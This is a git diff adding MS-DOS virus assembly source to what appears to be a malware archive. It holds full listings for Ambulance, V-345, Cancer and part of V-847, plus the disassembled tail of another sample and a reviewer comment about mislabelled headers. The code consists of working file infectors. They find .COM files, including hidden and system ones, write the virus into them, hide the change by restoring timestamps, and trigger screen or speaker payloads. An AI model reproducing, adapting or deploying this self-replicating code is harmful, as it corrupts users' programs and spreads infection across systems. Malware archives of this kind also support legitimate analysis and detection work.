+ JNZ H00335 ;0034B 75E8 u_
+ CALL SILENC ; . . . . . . . . . ;0034D E80300 ___
+ PUSH DS ;00350 1E _
+ POP ES ;00351 07 _
+ RET ;RET_Near ;00352 C3 _
+;---------------------------------------------------
+;********** Silence speaker
+SILENC: IN AL,61h ;Port_IN:61h ;00353 E461 _a
+ AND AL,0FCh ;00355 24FC $_
+ OUT 61h,AL ;Port_OUT:61h ;00357 E661 _a
+ RET ;RET_Near ;00359 C3 _
+;---------------------------------------------------
+H0035A: MOV DX,07D0h ;0035A BAD007 ___
+ TEST BP,0004h ;0035D F7C50400 ____
+ JZ H00366 ;00361 7403 t_
+ MOV DX,0BB8h ;00363 BAB80B ___
+H00366: IN AL,61h ;Port_IN:61h ;00366 E461 _a
+ TEST AL,03h ;00368 A803 __
+ JNZ H00374 ;0036A 7508 u_
+ OR AL,03h ;0036C 0C03 __
+ OUT 61h,AL ;Port_OUT:61h ;0036E E661 _a
+ MOV AL,0B6h ;00370 B0B6 __
+ OUT 43h,AL ;Port_OUT:43h ;00372 E643 _C
+H00374: MOV AX,DX ;00374 8BC2 __
+ OUT 42h,AL ;Port_OUT:42h ;00376 E642 _B
+ MOV AL,AH ;00378 88E0 __
+ OUT 42h,AL ;Port_OUT:42h ;0037A E642 _B
+ RET ;RET_Near ;0037C C3 _
+;---------------------------------------------------
+H0037D: PUSH CX ;0037D 51 Q
+ PUSH DX ;0037E 52 R
+ LEA BX,[SI+03BFh] ;0037F 8D9CBF03 ____
+ ADD BX,DX ;00383 03DA __
+ ADD DX,BP ;00385 01EA __
+ OR DX,DX ;00387 0BD2 __
+ JS H003BF ;00389 7834 x4
+ CMP DX,+50h ;0038B 83FA50 __P
+ JNB H003BF ;0038E 732F s/
+ MOV DI,0C80h ;00390 BF800C ___
+ ADD DI,DX ;00393 03FA __
+ ADD DI,DX ;00395 03FA __
+ SUB DX,BP ;00397 29EA )_
+ MOV CX,0005h ;00399 B90500 ___
+ MOV AH,07h ;0039C B407 __
+ MOV AL,[BX] ;0039E 8A07 __
+ SUB AL,07h ;003A0 2C07 ,_
+ ADD AL,CL ;003A2 02C1 __
+ SUB AL,DL ;003A4 28D0 (_
+ CMP CX,+05h ;003A6 83F905 ___
+ JNZ H003B5 ;003A9 750A u_
+ MOV AH,0Fh ;003AB B40F __
+ TEST BP,0003h ;003AD F7C50300 ____
+ JZ H003B5 ;003B1 7402 t_
+ MOV AL,20h ;003B3 B020 _
+H003B5: STOSW ;003B5 AB _
+ ADD BX,+10h ;003B6 83C310 ___
+ ADD DI,009Eh ;003B9 81C79E00 ____
+ LOOP H0039C ;003BD E2DD __
+H003BF: POP DX ;003BF 5A Z
+ POP CX ;003C0 59 Y
+ RET ;RET_Near ;003C1 C3 _
+;---------------------------------------------------
+H003C2: PUSH DS ;003C2 1E _
+ MOV AX,0040h ;003C3 B84000 _@_
+ MOV DS,AX ;DS_Chg ;003C6 8ED8 __
+ MOV AX,DS:[006Ch] ;003C8 A16C00 _l_
+ CMP AX,DS:[006Ch] ;003CB 3B066C00 ;_l_
+ JZ H003CB ;003CF 74FA t_
+ POP DS ;003D1 1F _
+ RET ;RET_Near ;003D2 C3 _
+;---------------------------------------------------
+ DB '"' ;003D3 22
+;---------------------------------------------------
+ AND SP,[SI] ;SP_Chg ;003D4 2324 #$
+ AND AX,2726h ;003D6 252627 %&'
+ SUB [BX+DI],CH ;003D9 2829 ()
+ DB 66h ;Indef_OP:66h ;003DB 66 f
+;---------------------------------------------------
+ XCHG DI,[BP+DI] ;003DC 873B _;
+ SUB AX,2F2Eh ;003DE 2D2E2F -./
+ XOR [BX+DI],DH ;003E1 3031 01
+ AND SP,AX ;SP_Chg ;003E3 23E0 #_
+ LOOPZ H003C9 ;003E5 E1E2 __
+ JCXZ H003CD ;003E7 E3E4 __
+ IN AX,0E6h ;Port_IN:E6h ;003E9 E5E6 __
+ OUT 0E7h,AX ;Port_OUT:E7h ;003EB E7E7 __
+ JMP H0EFDA ;003ED E9EAEB ___
+;---------------------------------------------------
+ XOR [BX+DI],DH ;003F0 3031 01
+ XOR AH,[SI] ;003F2 3224 2$
+ LOOPNZ H003D7 ;003F4 E0E1 __
+ LOOP H003DB ;003F6 E2E3 __
+ CALL H0EE25 ; . . . . . . . . . ;003F8 E82AEA _*_
+ OUT 0E8h,AX ;Port_OUT:E8h ;003FB E7E8 __
+ JMP H0342F ;003FD E92F30 _/0
+;---------------------------------------------------
+ DB 6Dh ;286_INSW ;00400 6D m
+;---------------------------------------------------
+ XOR DH,[BP+DI] ;00401 3233 23
+ AND AX,0E2E1h ;00403 25E1E2 %__
+ JCXZ H003EC ;00406 E3E4 __
+ IN AX,0E7h ;Port_IN:E7h ;00408 E5E7 __
+ OUT 0E8h,AX ;Port_OUT:E8h ;0040A E7E8 __
+ JMP H0EFF9 ;0040C E9EAEB ___
+;---------------------------------------------------
+ IN AL,DX ;Port_IN:DX ;0040F EC _
+ IN AX,DX ;Port_IN:DX ;00410 ED _
+ OUT DX,AL ;Port_OUT:DX ;00411 EE _
+ OUT DX,AX ;Port_OUT:DX ;00412 EF _
+ OUT 0E7h,AL ;ES_Ovrd ;00413 26E6E7 &__
+ SUB [BX+DI+5Ah],BX ;00416 29595A )YZ
+ SUB AL,0ECh ;00419 2CEC ,_
+ IN AX,DX ;Port_IN:DX ;0041B ED _
+ OUT DX,AL ;Port_OUT:DX ;0041C EE _
+ OUT DX,AX ;Port_OUT:DX ;0041D EF _
+ DB 0F0h ;LOCK:F0h ;0041E F0 _
+ XOR AH,[BP+SI+34] ;0041F 326234 2b4
+;---------------------------------------------------
+ HLT ;SYSTEM_HALT ;00422 F4 _
+ OR AL,[BX+SI] ;00423 0A00 __
+ JMP H00439 ;00425 E91100 ___
+;---------------------------------------------------
+ DB 0B4h, 09h, 0BAh ;First three bytes ;00428
+ DB 05,00 ;Dunno ;0042B
+ DB 0B4h, 09h, 0BAh ;First three bytes ;0042D
+ ;AGAIN! Wierd
+P00100 ENDP
+
+CODE ENDS
+ END H00100
+
+;-------------------------------------------------------------------------------
diff --git a/MSDOS/Virus.MSDOS.Unknown.ambulanc.asm b/MSDOS/Virus.MSDOS.Unknown.ambulanc.asm
new file mode 100644
index 00000000..40eb15f7
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.ambulanc.asm
@@ -0,0 +1,479 @@
+
+PAGE 59,132
+
+;
+;
+; AMBULANC
+;
+; Created: 13-Feb-92
+; Passes: 5 Analysis Options on: none
+;
+;
+
+data_1e equ 0Ch
+data_2e equ 49h
+data_3e equ 6Ch
+psp_envirn_seg equ 2Ch
+data_20e equ 0C80h
+
+seg_a segment byte public
+ assume cs:seg_a, ds:seg_a
+
+
+ org 100h
+
+ambulanc proc far
+
+start:
+ jmp loc_1
+ db 0
+data_7 dw 0 ; Data table (indexed access)
+ db 44 dup (0)
+loc_1:
+;* call sub_1 ;*
+ db 0E8h, 01h, 00h
+ add [bp-7Fh],bx
+ out dx,al ; port 0, DMA-1 bas&add ch 0
+ add ax,[bx+di]
+ call sub_2
+ call sub_2
+ call sub_4
+ lea bx,[si+419h] ; Load effective addr
+ mov di,100h
+ mov al,[bx]
+ mov [di],al
+ mov ax,[bx+1]
+ mov [di+1],ax
+ jmp di ;*Register jump
+
+loc_ret_2:
+ retn
+
+ambulanc endp
+
+;
+; SUBROUTINE
+;
+
+sub_2 proc near
+ call sub_3
+ mov al,byte ptr data_19[si]
+ or al,al ; Zero ?
+ jz loc_ret_2 ; Jump if zero
+ lea bx,[si+40Fh] ; Load effective addr
+ inc word ptr [bx]
+ lea dx,[si+428h] ; Load effective addr
+ mov ax,3D02h
+ int 21h ; DOS Services ah=function 3Dh
+ ; open file, al=mode,name@ds:dx
+ mov data_12[si],ax
+ mov bx,data_12[si]
+ mov cx,3
+ lea dx,[si+414h] ; Load effective addr
+ mov ah,3Fh ; '?'
+ int 21h ; DOS Services ah=function 3Fh
+ ; read file, bx=file handle
+ ; cx=bytes to ds:dx buffer
+ mov al,data_10[si]
+ cmp al,0E9h
+ jne loc_3 ; Jump if not equal
+ mov dx,data_11[si]
+ mov bx,data_12[si]
+ add dx,3
+ xor cx,cx ; Zero register
+ mov ax,4200h
+ int 21h ; DOS Services ah=function 42h
+ ; move file ptr, bx=file handle
+ ; al=method, cx,dx=offset
+ mov bx,data_12[si]
+ mov cx,6
+ lea dx,[si+41Ch] ; Load effective addr
+ mov ah,3Fh ; '?'
+ int 21h ; DOS Services ah=function 3Fh
+ ; read file, bx=file handle
+ ; cx=bytes to ds:dx buffer
+ mov ax,data_13[si]
+ mov bx,data_14[si]
+ mov cx,data_15[si]
+ cmp ax,word ptr ds:[100h][si]
+ jne loc_3 ; Jump if not equal
+ cmp bx,word ptr ds:[102h][si]
+ jne loc_3 ; Jump if not equal
+ cmp cx,data_7[si]
+ je loc_4 ; Jump if equal
+loc_3:
+ mov bx,data_12[si]
+ xor cx,cx ; Zero register
+ xor dx,dx ; Zero register
+ mov ax,4202h
+ int 21h ; DOS Services ah=function 42h
+ ; move file ptr, bx=file handle
+ ; al=method, cx,dx=offset
+ sub ax,3
+ mov data_9[si],ax
+ mov bx,data_12[si]
+ mov ax,5700h
+ int 21h ; DOS Services ah=function 57h
+ ; get file date+time, bx=handle
+ ; returns cx=time, dx=time
+ push cx
+ push dx
+ mov bx,data_12[si]
+ mov cx,319h
+ lea dx,[si+100h] ; Load effective addr
+ mov ah,40h ; '@'
+ int 21h ; DOS Services ah=function 40h
+ ; write file bx=file handle
+ ; cx=bytes from ds:dx buffer
+ mov bx,data_12[si]
+ mov cx,3
+ lea dx,[si+414h] ; Load effective addr
+ mov ah,40h ; '@'
+ int 21h ; DOS Services ah=function 40h
+ ; write file bx=file handle
+ ; cx=bytes from ds:dx buffer
+ mov bx,data_12[si]
+ xor cx,cx ; Zero register
+ xor dx,dx ; Zero register
+ mov ax,4200h
+ int 21h ; DOS Services ah=function 42h
+ ; move file ptr, bx=file handle
+ ; al=method, cx,dx=offset
+ mov bx,data_12[si]
+ mov cx,3
+ lea dx,[si+411h] ; Load effective addr
+ mov ah,40h ; '@'
+ int 21h ; DOS Services ah=function 40h
+ ; write file bx=file handle
+ ; cx=bytes from ds:dx buffer
+ pop dx
+ pop cx
+ mov bx,data_12[si]
+ mov ax,5701h
+ int 21h ; DOS Services ah=function 57h
+ ; set file date+time, bx=handle
+ ; cx=time, dx=time
+loc_4:
+ mov bx,data_12[si]
+ mov ah,3Eh ; '>'
+ int 21h ; DOS Services ah=function 3Eh
+ ; close file, bx=file handle
+ retn
+sub_2 endp
+
+
+;
+; SUBROUTINE
+;
+
+sub_3 proc near
+ mov ax,ds:psp_envirn_seg
+ mov es,ax
+ push ds
+ mov ax,40h
+ mov ds,ax
+ mov bp,ds:data_3e
+ pop ds
+ test bp,3
+ jz loc_7 ; Jump if zero
+ xor bx,bx ; Zero register
+loc_5:
+ mov ax,es:[bx]
+ cmp ax,4150h
+ jne loc_6 ; Jump if not equal
+ cmp word ptr es:[bx+2],4854h
+ je loc_8 ; Jump if equal
+loc_6:
+ inc bx
+ or ax,ax ; Zero ?
+ jnz loc_5 ; Jump if not zero
+loc_7:
+ lea di,[si+428h] ; Load effective addr
+ jmp short loc_13
+loc_8:
+ add bx,5
+loc_9:
+ lea di,[si+428h] ; Load effective addr
+loc_10:
+ mov al,es:[bx]
+ inc bx
+ or al,al ; Zero ?
+ jz loc_12 ; Jump if zero
+ cmp al,3Bh ; ';'
+ je loc_11 ; Jump if equal
+ mov [di],al
+ inc di
+ jmp short loc_10
+loc_11:
+ cmp byte ptr es:[bx],0
+ je loc_12 ; Jump if equal
+ shr bp,1 ; Shift w/zeros fill
+ shr bp,1 ; Shift w/zeros fill
+ test bp,3
+ jnz loc_9 ; Jump if not zero
+loc_12:
+ cmp byte ptr [di-1],5Ch ; '\'
+ je loc_13 ; Jump if equal
+ mov byte ptr [di],5Ch ; '\'
+ inc di
+loc_13:
+ push ds
+ pop es
+ mov data_16[si],di
+ mov ax,2E2Ah
+ stosw ; Store ax to es:[di]
+ mov ax,4F43h
+ stosw ; Store ax to es:[di]
+ mov ax,4Dh
+ stosw ; Store ax to es:[di]
+ push es
+ mov ah,2Fh ; '/'
+ int 21h ; DOS Services ah=function 2Fh
+ ; get DTA ptr into es:bx
+ mov ax,es
+ mov data_17[si],ax
+ mov data_18[si],bx
+ pop es
+ lea dx,[si+478h] ; Load effective addr
+ mov ah,1Ah
+ int 21h ; DOS Services ah=function 1Ah
+ ; set DTA(disk xfer area) ds:dx
+ lea dx,[si+428h] ; Load effective addr
+ xor cx,cx ; Zero register
+ mov ah,4Eh ; 'N'
+ int 21h ; DOS Services ah=function 4Eh
+ ; find 1st filenam match @ds:dx
+ jnc loc_14 ; Jump if carry=0
+ xor ax,ax ; Zero register
+ mov data_19[si],ax
+ jmp short loc_17
+loc_14:
+ push ds
+ mov ax,40h
+ mov ds,ax
+ ror bp,1 ; Rotate
+ xor bp,ds:data_3e
+ pop ds
+ test bp,7
+ jz loc_15 ; Jump if zero
+ mov ah,4Fh ; 'O'
+ int 21h ; DOS Services ah=function 4Fh
+ ; find next filename match
+ jnc loc_14 ; Jump if carry=0
+loc_15:
+ mov di,data_16[si]
+ lea bx,[si+496h] ; Load effective addr
+loc_16:
+ mov al,[bx]
+ inc bx
+ stosb ; Store al to es:[di]
+ or al,al ; Zero ?
+ jnz loc_16 ; Jump if not zero
+loc_17:
+ mov bx,data_18[si]
+ mov ax,data_17[si]
+ push ds
+ mov ds,ax
+ mov ah,1Ah
+ int 21h ; DOS Services ah=function 1Ah
+ ; set DTA(disk xfer area) ds:dx
+ pop ds
+ retn
+sub_3 endp
+
+
+;
+; SUBROUTINE
+;
+
+sub_4 proc near
+ push es
+ mov ax,data_8[si]
+ and ax,7
+ cmp ax,6
+ jne loc_18 ; Jump if not equal
+ mov ax,40h
+ mov es,ax
+ mov ax,es:data_1e
+ or ax,ax ; Zero ?
+ jnz loc_18 ; Jump if not zero
+ inc word ptr es:data_1e
+ call sub_5
+loc_18:
+ pop es
+ retn
+sub_4 endp
+
+
+;
+; SUBROUTINE
+;
+
+sub_5 proc near
+ push ds
+ mov di,0B800h
+ mov ax,40h
+ mov ds,ax
+ mov al,ds:data_2e
+ cmp al,7
+ jne loc_19 ; Jump if not equal
+ mov di,0B000h
+loc_19:
+ mov es,di
+ pop ds
+ mov bp,0FFF0h
+loc_20:
+ mov dx,0
+ mov cx,10h
+
+locloop_21:
+ call sub_8
+ inc dx
+ loop locloop_21 ; Loop if cx > 0
+
+ call sub_7
+ call sub_9
+ inc bp
+ cmp bp,50h
+ jne loc_20 ; Jump if not equal
+ call sub_6
+ push ds
+ pop es
+ retn
+sub_5 endp
+
+
+;
+; SUBROUTINE
+;
+
+sub_6 proc near
+ in al,61h ; port 61h, 8255 port B, read
+ and al,0FCh
+ out 61h,al ; port 61h, 8255 B - spkr, etc
+ ; al = 0, disable parity
+ retn
+sub_6 endp
+
+
+;
+; SUBROUTINE
+;
+
+sub_7 proc near
+ mov dx,7D0h
+ test bp,4
+ jz loc_22 ; Jump if zero
+ mov dx,0BB8h
+loc_22:
+ in al,61h ; port 61h, 8255 port B, read
+ test al,3
+ jnz loc_23 ; Jump if not zero
+ or al,3
+ out 61h,al ; port 61h, 8255 B - spkr, etc
+ mov al,0B6h
+ out 43h,al ; port 43h, 8253 wrt timr mode
+loc_23:
+ mov ax,dx
+ out 42h,al ; port 42h, 8253 timer 2 spkr
+ mov al,ah
+ out 42h,al ; port 42h, 8253 timer 2 spkr
+ retn
+sub_7 endp
+
+
+;
+; SUBROUTINE
+;
+
+sub_8 proc near
+ push cx
+ push dx
+ lea bx,[si+3BFh] ; Load effective addr
+ add bx,dx
+ add dx,bp
+ or dx,dx ; Zero ?
+ js loc_26 ; Jump if sign=1
+ cmp dx,50h
+ jae loc_26 ; Jump if above or =
+ mov di,data_20e
+ add di,dx
+ add di,dx
+ sub dx,bp
+ mov cx,5
+
+locloop_24:
+ mov ah,7
+ mov al,[bx]
+ sub al,7
+ add al,cl
+ sub al,dl
+ cmp cx,5
+ jne loc_25 ; Jump if not equal
+ mov ah,0Fh
+ test bp,3
+ jz loc_25 ; Jump if zero
+ mov al,20h ; ' '
+loc_25:
+ stosw ; Store ax to es:[di]
+ add bx,10h
+ add di,9Eh
+ loop locloop_24 ; Loop if cx > 0
+
+loc_26:
+ pop dx
+ pop cx
+ retn
+sub_8 endp
+
+
+;
+; SUBROUTINE
+;
+
+sub_9 proc near
+ push ds
+ mov ax,40h
+ mov ds,ax
+ mov ax,ds:data_3e
+loc_28:
+ cmp ax,ds:data_3e
+ je loc_28 ; Jump if equal
+ pop ds
+ retn
+sub_9 endp
+
+ and ah,[bp+di]
+ and al,25h ; '%'
+ db 26h, 27h, 28h, 29h, 66h, 87h
+ db 3Bh, 2Dh, 2Eh, 2Fh, 30h, 31h
+ db 23h,0E0h,0E1h,0E2h,0E3h,0E4h
+ db 0E5h,0E6h,0E7h,0E7h,0E9h,0EAh
+ db 0EBh
+ db 30h
+data_8 dw 3231h ; Data table (indexed access)
+ db 24h
+data_9 dw 0E1E0h ; Data table (indexed access)
+data_10 db 0E2h ; Data table (indexed access)
+data_11 dw 0E8E3h ; Data table (indexed access)
+data_12 dw 0EA2Ah ; Data table (indexed access)
+ db 0E7h,0E8h,0E9h
+data_13 dw 302Fh ; Data table (indexed access)
+data_14 dw 326Dh ; Data table (indexed access)
+data_15 dw 2533h ; Data table (indexed access)
+data_16 dw 0E2E1h ; Data table (indexed access)
+data_17 dw 0E4E3h ; Data table (indexed access)
+data_18 dw 0E7E5h ; Data table (indexed access)
+data_19 dw 0E8E7h ; Data table (indexed access)
+ db 0E9h,0EAh,0EBh,0ECh,0EDh,0EEh
+ db 0EFh, 26h,0E6h,0E7h, 29h, 59h
+ db 5Ah, 2Ch,0ECh,0EDh,0EEh,0EFh
+ db 0F0h, 32h, 62h, 34h,0F4h, 0Ah
+ db 00h,0E9h, 2Fh, 00h,0CDh, 20h
+ db 00h, 05h, 00h,0CDh, 20h, 00h
+
+seg_a ends
+
+
+
+ end start
diff --git a/MSDOS/Virus.MSDOS.Unknown.amst-299.asm b/MSDOS/Virus.MSDOS.Unknown.amst-299.asm
new file mode 100644
index 00000000..cb44f781
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.amst-299.asm
@@ -0,0 +1,133 @@
+ page ,132
+ name V345
+ title V-345 - a mutation of the V-845 virus
+ .radix 16
+code segment
+ assume cs:code,ds:code
+ org 100
+
+timer equ 6C
+dta equ 80
+ftime equ offset dta + 16
+fdate equ offset dta + 18
+fname equ offset dta + 1E
+virlen = offset endcode - offset start
+newid = offset ident - offset start
+
+start:
+ jmp short virus
+
+ident dw 'VI'
+counter db 0
+allcom db '*.COM',0
+progbeg dd ?
+eof dw ?
+
+virus:
+ push ax
+ mov ax,cs ;Move program code
+ add ax,1000 ; 64K bytes forward
+ mov es,ax
+ inc [counter]
+ mov si,offset start
+ xor di,di
+ mov cx,virlen
+ rep movsb
+
+ mov dx,offset allcom ;Search for '*.COM' files
+ mov cx,110b ;Normal, Hidden or System
+ mov ah,4E ;Find First file
+ int 21
+ jc done ;Quit if none found
+
+mainlp:
+ mov dx,fname
+ mov ax,3D02 ;Open file in Read/Write mode
+ int 21
+ mov bx,ax ; Save handle
+ push es
+ pop ds
+ mov dx,virlen
+ mov cx,0FFFF ;Read all bytes (64K max in .COM file)
+ mov ah,3F ;Read from handle
+ int 21 ;Bytes read in AX
+ add ax,virlen
+ mov cs:[eof],ax ;Save pointer to the end of file
+ cmp ds:[newid+virlen],'VI' ;Infected?
+ je close ;Go find next file if so
+
+ xor cx,cx ;Go to file beginning
+ mov dx,cx
+ mov ax,4200 ;LSEEK from the beginning of the file
+ int 21
+ jc close ;Leave this file if error occures
+
+ xor dx,dx ;Write the whole code (virus+file)
+ mov cx,cs:[eof] ; back onto the file
+ mov ah,40 ;Write to handle
+ int 21
+
+ mov cx,cs:[ftime]
+ mov dx,cs:[fdate]
+ mov ax,5701 ;Set file date/time
+ int 21
+
+close:
+ mov ah,3E ;Close the file
+ int 21
+
+ push cs
+ pop ds ;Restore DS
+ mov ah,4F ;Find next matching file
+ int 21
+ jc done ;Exit if all found
+ jmp mainlp ;Otherwise loop again
+
+done:
+ cmp [counter],5 ;If counter goes above 5,
+ jb progok ; the program becomes "sick"
+ mov ax,40
+ mov ds,ax ;Get the system timer value
+ mov ax,word ptr ds:[timer]
+ push cs
+ pop ds ;Restore DS
+ and ax,1 ;At random (if timer value is odd)
+ jz progok ; display the funny message
+ mov dx,offset message
+ mov ah,9 ;Print string
+ int 21
+ int 20 ;Terminate program
+
+message db 'Program sick error:Call doctor or '
+ db 'buy PIXEL for cure description',0A,0Dh,'$'
+
+progok:
+ mov si,offset transf ;Move this part of code
+ mov cx,offset endcode - offset transf ;Code length
+ xor di,di ;Move to ES:0
+ rep movsb ;Do it
+
+ pop bx ; BX = old AX
+ mov word ptr cs:[progbeg],0
+ mov word ptr cs:[progbeg+2],es ;Point progbeg at program start
+ jmp cs:[progbeg] ;Jump at program start
+
+transf:
+ push ds
+ pop es
+ mov si,offset endcode
+ mov di,offset start
+ mov cx,0FFFF ;Restore original program's code
+ sub cx,si
+ rep movsb
+ mov word ptr cs:[start],offset start
+ mov word ptr cs:[start+2],ds
+ mov ax,bx
+ jmp dword ptr cs:[start] ;Jump to program start
+endcode label byte
+
+ int 20 ;Dummy program
+
+code ends
+ end start
+
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.amst-345.asm b/MSDOS/Virus.MSDOS.Unknown.amst-345.asm
new file mode 100644
index 00000000..a7067cd2
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.amst-345.asm
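Review bot: The listing header in this file identifies the sample as V-345 (`name V345` / `title V-345 - a mutation of the V-845 virus`) although the file is catalogued as amst-299 and the sibling amst-345 file in this commit carries the identical header, so an analyst taking attribution from the `name`/`title` directives would mislabel this variant. Since these directives only affect the assembler listing, a comment is enough to record the discrepancy, e.g. `; NOTE: header copied from the V-345 listing; catalogued in this archive as amst-299` above `name V345`. The parent named here, "V-845", also differs from the "V-847" that the amst-740, amst-847 and amst-852 headers reference; that looks like a typo inherited from the 345 listing, but it cannot be confirmed from this commit alone.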
@@ -0,0 +1,134 @@
+ page ,132
+ name V345
+ title V-345 - a mutation of the V-845 virus
+ .radix 16
+code segment
+ assume cs:code,ds:code
+ org 100
+
+timer equ 6C
+olddta equ 80
+virlen = offset endcode - offset start
+newid = offset ident - offset start
+
+start:
+ jmp short virus
+
+ident dw 'VI'
+counter db 0
+allcom db '*.COM',0
+progbeg dd ?
+eof dw ?
+newdta db 2C dup (?)
+fname equ offset newdta+1E
+
+virus:
+ push ax
+ mov ax,cs ;Move program code
+ add ax,1000 ; 64K bytes forward
+ mov es,ax
+ inc [counter]
+ mov si,offset start
+ xor di,di
+ mov cx,virlen
+ rep movsb
+
+ mov dx,offset newdta ;Set new Disk Transfer Address
+ mov ah,1A ;Set DTA
+ int 21
+ mov dx,offset allcom ;Search for '*.COM' files
+ mov cx,110b ;Normal, Hidden or System
+ mov ah,4E ;Find First file
+ int 21
+ jc done ;Quit if none found
+
+mainlp:
+ mov dx,fname
+ mov ax,3D02 ;Open file in Read/Write mode
+ int 21
+ mov bx,ax ; Save handle
+ push es
+ pop ds
+ mov dx,virlen
+ mov cx,0FFFF ;Read all bytes (64K max in .COM file)
+ mov ah,3F ;Read from handle
+ int 21 ;Bytes read in AX
+ add ax,virlen
+ mov cs:[eof],ax ;Save pointer to the end of file
+ cmp ds:[newid+virlen],'VI' ;Infected?
+ je close ;Go find next file if so
+
+ xor cx,cx ;Go to file beginning
+ mov dx,cx
+ mov ax,4200 ;LSEEK from the beginning of the file
+ int 21
+ jc close ;Leave this file if error occures
+
+ xor dx,dx ;Write the whole code (virus+file)
+ mov cx,cs:[eof] ; back onto the file
+ mov ah,40 ;Write to handle
+ int 21
+
+close:
+ mov ah,3E ;Close the file
+ int 21
+
+ push cs
+ pop ds ;Restore DS
+ mov ah,4F ;Find next matching file
+ int 21
+ jc done ;Exit if all found
+ jmp mainlp ;Otherwise loop again
+
+done:
+ mov dx,olddta ;Restore old Disk Transfer Address
+ mov ah,1A ;Set DTA
+ int 21
+
+ cmp [counter],5 ;If counter goes above 5,
+ jb progok ; the program becomes "sick"
+ mov ax,40
+ mov ds,ax ;Get the system timer value
+ mov ax,word ptr [timer]
+ push cs
+ pop ds ;Restore DS
+ and ax,1 ;At random (if timer value is odd)
+ jz progok ; display the funny message
+ mov dx,offset message
+ mov ah,9 ;Print string
+ int 21
+ int 20 ;Terminate program
+
+message db 'Program sick error:Call doctor or '
+ db 'buy PIXEL for cure description',0A,0Dh,'$'
+
+progok:
+ mov si,offset transf ;Move this part of code
+ mov cx,offset endcode - offset transf ;Code length
+ xor di,di ;Move to ES:0
+ rep movsb ;Do it
+
+ pop bx ; BX = old AX
+ mov word ptr cs:[progbeg],0
+ mov word ptr cs:[progbeg+2],es ;Point progbeg at program start
+ jmp cs:[progbeg] ;Jump at program start
+
+transf:
+ push ds
+ pop es
+ mov si,offset endcode
+ mov di,offset start
+ mov cx,0FFFF ;Restore original program's code
+ sub cx,si
+ rep movsb
+ mov word ptr cs:[start],offset start
+ mov word ptr cs:[start+2],ds
+ mov ax,bx
+ jmp dword ptr cs:[start] ;Jump to program start
+endcode label byte
+
+ int 20 ;Dummy program
+
+code ends
+ end start
+
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.amst-740.asm b/MSDOS/Virus.MSDOS.Unknown.amst-740.asm
new file mode 100644
index 00000000..11686803
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.amst-740.asm
@@ -0,0 +1,128 @@
+ page ,132
+ name CANCER
+ title Cancer - a mutation of the V-847 virus
+ .radix 16
+code segment
+ assume cs:code,ds:code
+ org 100
+
+olddta equ 80
+virlen equ offset endcode - offset start
+smalcod equ offset endcode - offset transf
+buffer equ offset endcode + 100
+newdta equ offset endcode + 10
+fname = newdta + 1E
+virlenx = offset endcode - offset start
+
+start:
+ jmp cancer
+
+ident dw 'VI'
+counter db 0
+allcom db '*.COM',0
+vleng db virlen
+n_10D db 3 ;Unused
+progbeg dd ?
+eof dw ?
+handle dw ?
+
+cancer:
+ mov ax,cs ;Move program code
+ add ax,1000 ; 64K bytes forward
+ mov es,ax
+ inc [counter]
+ mov si,offset start
+ xor di,di
+ mov cx,virlen
+ rep movsb
+
+ mov dx,newdta ;Set new Disk Transfer Address
+ mov ah,1A ;Set DTA
+ int 21
+ mov dx,offset allcom ;Search for '*.COM' files
+ mov cx,110b ;Normal, Hidden or System
+ mov ah,4E ;Find First file
+ int 21
+ jc done ;Quit if none found
+
+mainlp:
+ mov dx,offset fname
+ mov ax,3D02 ;Open file in Read/Write mode
+ int 21
+ mov [handle],ax ;Save handle
+ mov bx,ax
+ push es
+ pop ds
+ mov dx,buffer
+ mov cx,0FFFF ;Read all bytes
+ mov ah,3F ;Read from handle
+ int 21 ;Bytes read in AX
+ add ax,buffer
+ mov cs:[eof],ax ;Save pointer to the end of file
+
+ xor cx,cx ;Go to file beginning
+ mov dx,cx
+ mov bx,cs:[handle]
+ mov ax,4200 ;LSEEK from the beginning of the file
+ int 21
+ jc close ;Leave this file if error occures
+
+ mov dx,0 ;Write the whole code (virus+file)
+ mov cx,cs:[eof] ; back onto the file
+ mov bx,cs:[handle]
+ mov ah,40 ;Write to handle
+ int 21
+
+close:
+ mov bx,cs:[handle]
+ mov ah,3E ;Close the file
+ int 21
+
+ push cs
+ pop ds ;Restore DS
+ mov ah,4F ;Find next matching file
+ mov dx,newdta
+ int 21
+ jc done ;Exit if all found
+ jmp mainlp ;Otherwise loop again
+
+done:
+ mov dx,olddta ;Restore old Disk Transfer Address
+ mov ah,1A ;Set DTA
+ int 21
+
+ mov si,offset transf ;Move this part of code
+ mov cx,smalcod ;Code length
+ xor di,di ;Move to ES:0
+ rep movsb ;Do it
+
+ xor di,di ;Clear DI
+ mov word ptr cs:[progbeg],0
+ mov word ptr cs:[progbeg+2],es ;Point progbeg at program start
+ jmp cs:[progbeg] ;Jump at program start
+
+transf:
+ push ds
+ pop es
+ mov si,buffer+100
+ cmp [counter],1
+ jne skip
+ sub si,200
+skip:
+ mov di,offset start
+ mov cx,0FFFF ;Restore original program's code
+ sub cx,si
+ rep movsb
+ mov word ptr cs:[start],offset start
+ mov word ptr cs:[start+2],ds
+ jmp dword ptr cs:[start] ;Jump to program start
+endcode label byte
+
+ int 20 ;Dummy program
+ int 20 ;???
+
+ db 0 ;Unused
+
+code ends
+ end start
+
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.amst-847.asm b/MSDOS/Virus.MSDOS.Unknown.amst-847.asm
new file mode 100644
index 00000000..b9c4899e
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.amst-847.asm
@@ -0,0 +1,150 @@
+ page ,132
+ name V847
+ title The V-847 virus
+ .radix 16
+code segment
+ assume cs:code,ds:code
+ org 100
+
+timer equ 6C
+olddta equ 80
+virlen equ offset endcode - offset start
+smalcod equ offset endcode - offset transf
+buffer equ offset endcode + 100
+newdta equ offset endcode + 10
+fname = newdta + 1E
+virlenx = offset endcode - offset start
+newid = offset ident + virlenx + 100
+
+start:
+ jmp virus
+
+ident dw 'VI'
+counter db 0
+allcom db '*.COM',0
+vleng dw 44F ;Unused
+progbeg dd 10000h
+eof dw ?
+handle dw ?
+
+virus:
+ mov ax,cs ;Move program code
+ add ax,1000 ; 64K bytes forward
+ mov es,ax
+ inc [counter]
+ mov si,offset start
+ xor di,di
